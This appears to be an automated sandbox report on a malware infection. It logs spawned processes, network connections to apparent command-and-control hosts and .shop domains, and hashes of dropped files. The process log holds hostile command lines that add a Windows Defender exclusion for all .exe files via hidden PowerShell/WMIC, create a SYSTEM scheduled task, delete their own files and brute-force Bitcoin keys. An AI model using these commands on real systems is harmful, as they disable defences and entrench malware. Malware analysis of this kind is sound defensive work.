--server-tracking-blob="MjAyMTM2YTAxMGY5N2I3M2E1MTRlOWNjZjAxMjU4NTI2MGU4OTgyYTE2MTU1Yzg3NmQ5NDU1Mzc1MTNlZGVmODp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDU2MDk1LjI2MDMiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMDk3NzI2ZWYtMDBhNC00ZWZmLWEyMzYtZWFmYjlkMDdmNDBiIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=DC04000000000000
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x2a8,0x2ac,0x274,0x2b0,0x6b40e1d0,0x6b40e1dc,0x6b40e1e8
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\u53k.3.exe
"C:\Users\Admin\AppData\Local\Temp\u53k.3.exe"
C:\Users\Admin\Pictures\qljIlML54xtrmsfmXnFGGOr1.exe
"C:\Users\Admin\Pictures\qljIlML54xtrmsfmXnFGGOr1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6608 -ip 6608
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7044 -ip 7044
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1244
C:\Users\Admin\AppData\Local\Temp\7zS6B62.tmp\Install.exe
.\Install.exe /RvdidblCuX "385118" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClientC confirm
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Program Files (x86)\GameServerClient\GameServerClient.exe
"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ULdqcYh.exe\" em /wwsite_idwFX 385118 /S" /V1 /F
C:\Windows\Temp\698902.exe
"C:\Windows\Temp\698902.exe" --list-devices
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe
"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Temp\977504.exe
"C:\Windows\Temp\977504.exe" --coin BTC -m ADDRESSES -t 0 --range 341f25d3c80000000:341f25d3cc0000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0xd06038,0xd06044,0xd06050
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| RU | 193.233.132.139:80 | 193.233.132.139 | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | 139.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 238.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.69.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.16.234:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.youtube.com | udp |
| GB | 142.250.200.14:443 | accounts.youtube.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.238:443 | play.google.com | tcp |
| GB | 142.250.187.238:443 | play.google.com | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.139.73.23.in-addr.arpa | udp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | affordcharmcropwo.shop | udp |
| US | 172.67.181.34:443 | affordcharmcropwo.shop | tcp |
| US | 8.8.8.8:53 | cleartotalfisherwo.shop | udp |
| US | 8.8.8.8:53 | 34.181.67.172.in-addr.arpa | udp |
| US | 188.114.96.2:443 | cleartotalfisherwo.shop | tcp |
| US | 8.8.8.8:53 | worryfillvolcawoi.shop | udp |
| US | 172.67.199.191:443 | worryfillvolcawoi.shop | tcp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.199.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | enthusiasimtitleow.shop | udp |
| US | 172.67.183.226:443 | enthusiasimtitleow.shop | tcp |
| US | 8.8.8.8:53 | dismissalcylinderhostw.shop | udp |
| US | 104.21.22.160:443 | dismissalcylinderhostw.shop | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | 226.183.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | diskretainvigorousiw.shop | udp |
| US | 8.8.8.8:53 | 19.128.172.185.in-addr.arpa | udp |
| US | 172.67.211.165:443 | diskretainvigorousiw.shop | tcp |
| US | 8.8.8.8:53 | communicationgenerwo.shop | udp |
| US | 172.67.166.251:443 | communicationgenerwo.shop | tcp |
| US | 8.8.8.8:53 | 165.211.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | productivelookewr.shop | udp |
| US | 104.21.11.250:443 | productivelookewr.shop | tcp |
| US | 8.8.8.8:53 | pillowbrocccolipe.shop | udp |
| US | 104.21.47.56:443 | pillowbrocccolipe.shop | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | 251.166.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.11.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tolerateilusidjukl.shop | udp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 172.67.147.41:443 | tolerateilusidjukl.shop | tcp |
| US | 8.8.8.8:53 | 56.47.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.147.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shatterbreathepsw.shop | udp |
| US | 172.67.169.43:443 | shatterbreathepsw.shop | tcp |
| US | 8.8.8.8:53 | shortsvelventysjo.shop | udp |
| US | 172.67.216.69:443 | shortsvelventysjo.shop | tcp |
| US | 8.8.8.8:53 | 43.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.216.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | incredibleextedwj.shop | udp |
| US | 172.67.218.63:443 | incredibleextedwj.shop | tcp |
| US | 8.8.8.8:53 | 63.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | alcojoldwograpciw.shop | udp |
| US | 172.67.157.23:443 | alcojoldwograpciw.shop | tcp |
| US | 8.8.8.8:53 | liabilitynighstjsko.shop | udp |
| US | 188.114.97.2:443 | liabilitynighstjsko.shop | tcp |
| US | 8.8.8.8:53 | 23.157.67.172.in-addr.arpa | udp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 8.8.8.8:53 | demonstationfukewko.shop | udp |
| US | 104.21.33.174:443 | demonstationfukewko.shop | tcp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.33.21.104.in-addr.arpa | udp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| FR | 52.143.157.84:80 | 52.143.157.84 | tcp |
| RU | 77.221.151.47:80 | 77.221.151.47 | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 84.157.143.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.151.221.77.in-addr.arpa | udp |
| RU | 5.42.65.67:48396 | tcp | |
| DE | 185.172.128.33:8970 | tcp | |
| RU | 185.215.113.67:26260 | tcp | |
| US | 8.8.8.8:53 | 67.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | skategirls.org | udp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.188.67.172.in-addr.arpa | udp |
| US | 188.114.96.2:443 | realdeepai.org | tcp |
| US | 188.114.96.2:443 | realdeepai.org | tcp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 172.67.176.131:443 | jonathantwo.com | tcp |
| US | 172.67.176.131:443 | jonathantwo.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.176.67.172.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 228.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| US | 8.8.8.8:53 | 106.76.97.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 20.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 10.66.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.75.67.172.in-addr.arpa | udp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.128.172.185.in-addr.arpa | udp |
| NL | 82.145.216.15:443 | tcp | |
| NL | 82.145.216.23:443 | tcp | |
| US | 8.8.8.8:53 | 23.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| US | 2.16.106.156:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 45.87.157.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.106.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| FR | 143.244.56.50:443 | download.iolo.net | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | download5.operacdn.com | udp |
| US | 104.18.11.89:443 | download5.operacdn.com | tcp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 8.8.8.8:53 | 89.11.18.104.in-addr.arpa | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | 79.239.69.13.in-addr.arpa | udp |
| RU | 91.215.85.66:15647 | tcp | |
| US | 8.8.8.8:53 | 66.85.215.91.in-addr.arpa | udp |
Files
memory/4476-0-0x00000000006B0000-0x0000000000B6E000-memory.dmp
memory/4476-1-0x0000000077DA4000-0x0000000077DA6000-memory.dmp
memory/4476-3-0x00000000051D0000-0x00000000051D1000-memory.dmp
memory/4476-2-0x00000000051C0000-0x00000000051C1000-memory.dmp
memory/4476-4-0x00000000051B0000-0x00000000051B1000-memory.dmp
memory/4476-6-0x0000000005190000-0x0000000005191000-memory.dmp
memory/4476-5-0x00000000051F0000-0x00000000051F1000-memory.dmp
memory/4476-7-0x00000000051A0000-0x00000000051A1000-memory.dmp
memory/4476-9-0x0000000005210000-0x0000000005211000-memory.dmp
memory/4476-8-0x0000000005220000-0x0000000005221000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
| MD5 | ea2314bc92bc85449967f3702b16b3f1 |
| SHA1 | 1b7b0006e65b9034617993710ea434f5a5f8a9d3 |
| SHA256 | 77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1 |
| SHA512 | f7964e45d1c6c1f280d277126a65c10dad131f761125f59bcfd305d4af73fc673bc5670685f4f5c7d8b4f9cf74be55eaef13eb95458bf93bc307a8bb6a1ad8db |
memory/4476-20-0x00000000006B0000-0x0000000000B6E000-memory.dmp
memory/224-23-0x00000000009A0000-0x0000000000E5E000-memory.dmp
memory/224-24-0x00000000051B0000-0x00000000051B1000-memory.dmp
memory/224-25-0x00000000051C0000-0x00000000051C1000-memory.dmp
memory/224-26-0x00000000051F0000-0x00000000051F1000-memory.dmp
memory/224-27-0x0000000005180000-0x0000000005181000-memory.dmp
memory/224-28-0x00000000051A0000-0x00000000051A1000-memory.dmp
memory/224-29-0x0000000005190000-0x0000000005191000-memory.dmp
memory/224-30-0x00000000051E0000-0x00000000051E1000-memory.dmp
memory/224-31-0x0000000005210000-0x0000000005211000-memory.dmp
memory/224-32-0x0000000005200000-0x0000000005201000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe
| MD5 | d29e40c77247d5eea4c4029b804aa549 |
| SHA1 | 9031e95e7c03ebe7b7c1e828bf18325a76972168 |
| SHA256 | 0baee82ecdf7b62ca540857e4e3a46dfeda2e4c31352a4a064af7c40c154b9c2 |
| SHA512 | 3a50c63887f677aae90fb976b5c8677f913447cb6700eeb83bcc261e60d2d394f8876350b10e6c6b4e1906a7f05777eb6379346dbf0d618f1e3e35febbf5a4cf |
memory/2504-50-0x0000000000850000-0x0000000000D2E000-memory.dmp
memory/2504-51-0x0000000000850000-0x0000000000D2E000-memory.dmp
memory/2504-57-0x00000000053F0000-0x00000000053F1000-memory.dmp
memory/2504-58-0x0000000005440000-0x0000000005441000-memory.dmp
memory/2504-56-0x00000000053E0000-0x00000000053E1000-memory.dmp
memory/2504-55-0x0000000005450000-0x0000000005451000-memory.dmp
memory/2504-54-0x0000000005400000-0x0000000005401000-memory.dmp
memory/2504-53-0x0000000005420000-0x0000000005421000-memory.dmp
memory/2504-52-0x0000000005410000-0x0000000005411000-memory.dmp
C:\Users\Admin\1000013002\611b2ae010.exe
| MD5 | 3c0e9766b3871534c9ce1cb3c1bd6411 |
| SHA1 | 51c16a07072426188274a51ed54f9221451d3d07 |
| SHA256 | 7c813337ec7128442715e50e9206b28eeeeef151d1d9e2feb811813c44ff0cf3 |
| SHA512 | 43f315a302619547012defee1a136d9fe209fa4049fd6dc9ac88cfd4c8d721aa095062869c175219c4244dbf7d67854b15e5e0aab0c61aa2a2126f62c1f0bf98 |
memory/2504-67-0x0000000005470000-0x0000000005471000-memory.dmp
memory/2504-68-0x0000000005460000-0x0000000005461000-memory.dmp
memory/2504-83-0x0000000000850000-0x0000000000D2E000-memory.dmp
\??\pipe\crashpad_3420_HEXBDTNPREYSLJIE
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/224-93-0x00000000009A0000-0x0000000000E5E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000014001\e902973543.exe
| MD5 | c276e339570b6fd5baee1f245d5709fe |
| SHA1 | 26441e287b3afea93aa261fe67e462198f6dd6a5 |
| SHA256 | bb8ffe36beffbd984cff743f7091577798e5a58c7f6292bebc913bea7188a288 |
| SHA512 | aa22735eb01db36c14935640814c275dbde94602d13095fded0c36c19bb8ba2160b8fa63471cd131169554ea657cd6db8b7bf1b5fba19aeee8ab3412277ebf72 |
memory/4660-120-0x0000000000660000-0x0000000000C4B000-memory.dmp
memory/4660-123-0x0000000004B10000-0x0000000004B11000-memory.dmp
memory/4660-125-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
memory/4660-126-0x0000000004B50000-0x0000000004B51000-memory.dmp
memory/4660-127-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
memory/4660-129-0x0000000004B30000-0x0000000004B31000-memory.dmp
memory/4660-132-0x0000000004B40000-0x0000000004B41000-memory.dmp
memory/4660-137-0x0000000004B20000-0x0000000004B21000-memory.dmp
memory/4660-138-0x0000000004B70000-0x0000000004B71000-memory.dmp
memory/4660-128-0x0000000004AC0000-0x0000000004AC2000-memory.dmp
memory/4660-140-0x0000000004B00000-0x0000000004B01000-memory.dmp
memory/4660-141-0x0000000004B60000-0x0000000004B61000-memory.dmp
memory/4660-142-0x0000000004B80000-0x0000000004B82000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e9bc1a1140a9953f3a165107fff2df79 |
| SHA1 | 9186f389c169d933bab166260612eb9b24ee2d4c |
| SHA256 | bd8f113fbf650842594d0cd0276398d8fe0989aa90cf532969fdf26a9e79e41c |
| SHA512 | 115b9b2aa67d7071e180b8b4c7441ca31b7c1b070c6f77e688a383741c72d0838635eab06553d62d421890efe630807121dabd9992e80ac4e1b6fa587e5ca178 |
memory/224-160-0x00000000009A0000-0x0000000000E5E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fcde4c842b1c5e8b122dff2b1155e2d5 |
| SHA1 | b78ef47686ad4c0d076c325f4f1b5eca2dbe7c25 |
| SHA256 | fed78a50a223b51e975b7dda002371d1f2f9ac8ae37bdc96c80cfb5db6cd9d8c |
| SHA512 | f26de8a485066a09f8b1cabc3b05642fd2bbffe5767c2d26b129a4d3d8b46b2496b597a1b4284132b8a45b84c443f595a6ced8704c8419b023672a34d01dbc14 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 69aea23048d3a34953ddc8fa4e5bbc00 |
| SHA1 | d289a95d55aa9064c9c5ae541614fa423e556d6f |
| SHA256 | faf1b7196f5169a8dc3ad5f66201bd53dc5c9cda17a94c98aaf9b2fbbb775689 |
| SHA512 | b31e0a985231c979c9e2fbdc89b959aea477c58d05a8684eeffc5201c28f66d631ecc2d03616f8dbbc7eaa47cef94c32031dd9c8ff62cd3bb2b5411efb19ddcf |
memory/4660-173-0x0000000000660000-0x0000000000C4B000-memory.dmp
memory/5928-177-0x00000000009A0000-0x0000000000E5E000-memory.dmp
memory/5920-178-0x0000000000C70000-0x000000000114E000-memory.dmp
memory/5920-179-0x0000000000C70000-0x000000000114E000-memory.dmp
memory/5920-180-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
memory/5920-181-0x0000000004BE0000-0x0000000004BE1000-memory.dmp
memory/5920-182-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
memory/5920-185-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
memory/5920-184-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
memory/5920-183-0x0000000004C00000-0x0000000004C01000-memory.dmp
memory/5928-186-0x00000000051C0000-0x00000000051C1000-memory.dmp
memory/5928-187-0x00000000051A0000-0x00000000051A1000-memory.dmp
memory/5928-190-0x0000000005190000-0x0000000005191000-memory.dmp
memory/5928-189-0x0000000005180000-0x0000000005181000-memory.dmp
memory/5928-188-0x00000000051E0000-0x00000000051E1000-memory.dmp
memory/5928-191-0x00000000051B0000-0x00000000051B1000-memory.dmp
memory/5920-192-0x0000000004C30000-0x0000000004C31000-memory.dmp
memory/5920-193-0x0000000004C20000-0x0000000004C21000-memory.dmp
memory/5928-194-0x00000000009A0000-0x0000000000E5E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
| MD5 | 1c7d0f34bb1d85b5d2c01367cc8f62ef |
| SHA1 | 33aedadb5361f1646cffd68791d72ba5f1424114 |
| SHA256 | e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c |
| SHA512 | 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d |
